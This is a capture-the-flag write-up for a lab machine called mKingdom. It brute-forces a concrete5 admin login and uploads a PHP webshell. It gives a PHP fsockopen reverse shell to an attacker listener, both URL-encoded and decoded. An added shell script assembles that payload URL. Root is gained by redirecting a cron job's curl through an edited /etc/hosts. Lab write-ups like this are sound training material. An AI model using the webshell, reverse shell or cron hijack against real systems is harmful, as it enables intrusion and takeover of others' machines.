mKingdom


Target IP: 10.10.195.160
Challenge Description: Try to root the machine!


Reconnaissance

[Screenshot: nmap -sS full TCP port scan output]
To begin the challenge, I performed a full TCP port scan against the target using the command sudo nmap -sS 10.10.195.160 -p- and obtained the result shown above. Only one TCP port is open on the target machine: port 85.

[Screenshot: nmap -sV -A scan of port 85]
I then ran a service and version scan against that port using the command sudo nmap -sV -A 10.10.195.160 -p 85 and obtained the result shown above. The target is running an HTTP server on port 85. Subdomain enumeration did not turn up anything useful, so the next step is to enumerate this port further.


Enumeration

Port 85: HTTP
[Screenshot: nikto scan output]
I scanned the web server on port 85 using the command nikto -h http://10.10.195.160:85 and obtained the result shown above. The most interesting finding is a directory named /app. Time to perform a directory search to identify any other useful directories.

[Screenshot: gobuster directory scan output]
A directory search using the command gobuster dir -u http://10.10.195.160:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt also identified the /app directory.

[Screenshot: homepage at http://10.10.195.160:85/]
Browsing to http://10.10.195.160:85/ returns the page shown above. Reviewing its source code did not reveal anything useful either. Time to visit the /app directory.

[Screenshot: /app page with the JUMP button]
Browsing to the /app directory returns the page shown above, which has a single button labelled JUMP.

<button onclick="buttonClick()">JUMP</button>

<script>
    function buttonClick() {
        alert("Make yourself confortable and enjoy my place.");
        window.location.href = 'castle';
    }
</script>

The source code of the /app page contains the script shown above. Pressing the JUMP button calls buttonClick(), which displays an alert and then sets window.location.href to the relative path castle, so the browser is redirected to /app/castle.

[Screenshot: /app/castle page]
I pressed the button and the page shown above was returned. After some manual enumeration of this page, I found possible usernames such as toad and toadette.

[Screenshot: page source revealing concrete5 8.5.2]
The page source reveals the application name and version, concrete5 8.5.2, as shown above. Is this version vulnerable? Time to find out.

[Screenshot: search result describing the concrete5 8.5.2 authenticated RCE]
A Google search for concrete5 8.5.2 vulnerabilities led me to the page shown above. This version is vulnerable to remote code execution, but only from an authenticated administrator account. The page also documents the steps to compromise the application once admin access is obtained, so if I can get admin credentials I should be able to reproduce them.

[Screenshot: concrete5 login page]
I found the login page and tried default credentials such as admin:admin and admin:root, without success. Time to brute-force the login. I started Burp Suite on my machine and intercepted a login request.

[Screenshot: Burp Intruder results showing the hit for admin:password]
I brute-forced the password of the user admin with Intruder's Sniper attack, marking only the password field as the payload position and using the wordlist 10-million-password-list-top-1000.txt. The attack produced a hit: the credentials admin:password, as shown above.

[Screenshot: concrete5 dashboard after logging in as admin]
And bingo! I now have admin access to the web application with the credentials admin:password, and can follow the steps from the page I found earlier to upload a webshell and get a reverse shell.


Exploitation

Owning the Web Application: Webshell Upload via File Upload Attack
[Screenshot: steps to reproduce the RCE]
The steps to reproduce the RCE on the target machine are shown above.

[Screenshot: Allowed File Types list with php added]
I added php to the Allowed File Types list, as shown above, so that the File Manager will accept a .php upload.

[Screenshot: contents of shell.php]
On my machine, I created a simple PHP webshell named shell.php, whose content is shown above. Time to upload it through the File Manager on the target.

[Screenshot: shell.php uploaded via the File Manager]
I uploaded the webshell as shown above. To use it I need the URL it is served from, so I right-clicked shell.php in the File Manager and opened Properties.

Foothold: RCE via Webshell & Reverse Shell Connection
[Screenshot: webshell output of ls;whoami;id]
The Properties dialog shows that the webshell is served at http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php. Visiting that URL confirms code execution: the shell takes the command in its cmd parameter, and running ls;whoami;id produced the result shown above. Time to get a reverse shell. I first started a listener on my machine on port 8443.

[Screenshot: reverse shell connection received on port 8443]
Then, through the webshell, I sent the URL-encoded reverse shell command php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and received a connection on port 8443. The full URL with the payload is http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fsh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. Decoded, the payload is php -r '$sock=fsockopen("10.14.55.153",8443);shell_exec("/bin/sh <&3 >&3 2>&3");', which opens a TCP socket to my listener and attaches /bin/sh's input, output and error streams to it. I now have a foothold on the target machine as the user www-data. Time to elevate my privileges to obtain a root shell :)
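For reference, the following shell script is an added example (not part of the original writeup) that shows how the payload above is assembled: a POSIX urlencode function, the PHP fsockopen one-liner built from a listener IP and port, and the final webshell URL. It assumes, as the URL above shows, that the uploaded shell.php executes whatever arrives in the cmd GET parameter; the listener itself is started separately, for example with nc -lvnp 8443.

```shell
#!/bin/sh
# Added example: build the webshell URL that carries the PHP reverse shell payload.
# Assumption: the uploaded shell.php runs the value of the "cmd" GET parameter.

# Percent-encode every byte except the RFC 3986 unreserved set (A-Z a-z 0-9 - . _ ~).
# Pure POSIX sh: walks the string one character at a time.
urlencode() {
    s=$1
    out=""
    while [ -n "$s" ]; do
        rest=${s#?}            # everything after the first character
        c=${s%"$rest"}         # the first character itself
        case $c in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'x" makes printf use the byte value of x
        esac
        s=$rest
    done
    printf '%s' "$out"
}

# PHP one-liner: open a TCP socket to LHOST:LPORT and wire /bin/sh's stdin, stdout and
# stderr to it. The socket is the next free descriptor in the php process, i.e. fd 3.
revshell_cmd() {
    lhost=$1
    lport=$2
    printf '%s' "php -r '\$sock=fsockopen(\"$lhost\",$lport);shell_exec(\"/bin/sh <&3 >&3 2>&3\");'"
}

# Full URL to request once the listener is up.
webshell_url() {
    base=$1   # URL of the uploaded webshell
    cmd=$2    # shell command to run on the target
    printf '%s?cmd=%s' "$base" "$(urlencode "$cmd")"
}

# Values from the writeup: webshell location on the target, attacker listener 10.14.55.153:8443.
SHELL_URL='http://10.10.195.160:85/app/castle/application/files/2817/1857/1519/shell.php'
printf '%s\n' "$(webshell_url "$SHELL_URL" "$(revshell_cmd 10.14.55.153 8443)")"
```

Encoding everything outside the unreserved set is deliberate: characters such as /, &, = and ; would otherwise be interpreted by the web server or PHP as URL structure rather than as part of the command.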


Privilege Escalation

Horizontal Privilege Escalation: www-data to toad to mario
[Screenshot: database.php containing the password toadisthebest]
On the target machine, I noticed two users: toad and mario. After some manual enumeration, I found a file named database.php that contains the password toadisthebest. Given the name, this password may belong to the user toad as well. Can I switch user with it?

[Screenshot: su toad succeeding]
And bingo! I ran su toad with the password toadisthebest and it worked: I moved from www-data to the user toad, as shown above.

[Screenshot: env output showing PWD_token]
Running env to list the environment variables showed an interesting entry named PWD_token with the value aWthVGVOVEFOdEVTCg==, as shown above. The value is base64; decoding it in CyberChef (or with echo aWthVGVOVEFOdEVTCg== | base64 -d on the target) gives the string ikaTeNTANtES. Does this password belong to the user mario? Time to find out.

[Screenshot: su mario succeeding]
And bingo! The password belongs to the user mario, as shown above, and I switched to that user.

Vertical Privilege Escalation: Mario to Root via /etc/hosts Hijacking & Cronjob Execution
[Screenshot: pspy64 output showing the cron job]
I transferred pspy64 to the target machine and ran it. After waiting for some time, I obtained the output shown above. The most interesting entry is /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh, a cron job that fetches counter.sh from /app/castle/application/ on the host mkingdom.thm, port 85, and appears to execute it. Because the job refers to the host by name, and name resolution consults /etc/hosts before DNS, I can hijack it by mapping mkingdom.thm to my machine in /etc/hosts. This only works because /etc/hosts is writable by mario (check with ls -l /etc/hosts). I then need to serve a malicious counter.sh at the same path, /app/castle/application/, on port 85 of my machine.

[Screenshot: counter.sh and the Python HTTP server on port 85]
On my machine, I created the same directory structure and the malicious script counter.sh inside it, as shown above. Then I started a Python HTTP server on port 85 using the command python3 -m http.server 85, run from the directory that contains app/ so that the request path /app/castle/application/counter.sh resolves to the file. Time to edit /etc/hosts on the target machine and point the domain name mkingdom.thm at my IP address.

[Screenshot: /etc/hosts entry mapping mkingdom.thm to the attacker IP]
I edited /etc/hosts on the target machine with nano, as shown above, adding an entry that maps mkingdom.thm to my IP address. Then I started a listener on my machine on port 8444.

[Screenshot: root shell received on port 8444]
And bingo. After waiting for the cron job to fire, I received a root shell on port 8444, as shown above.


Flags

[Screenshot: user and root flags]
The two flags are shown above. I had to read them with tail, as cat did not work. GG.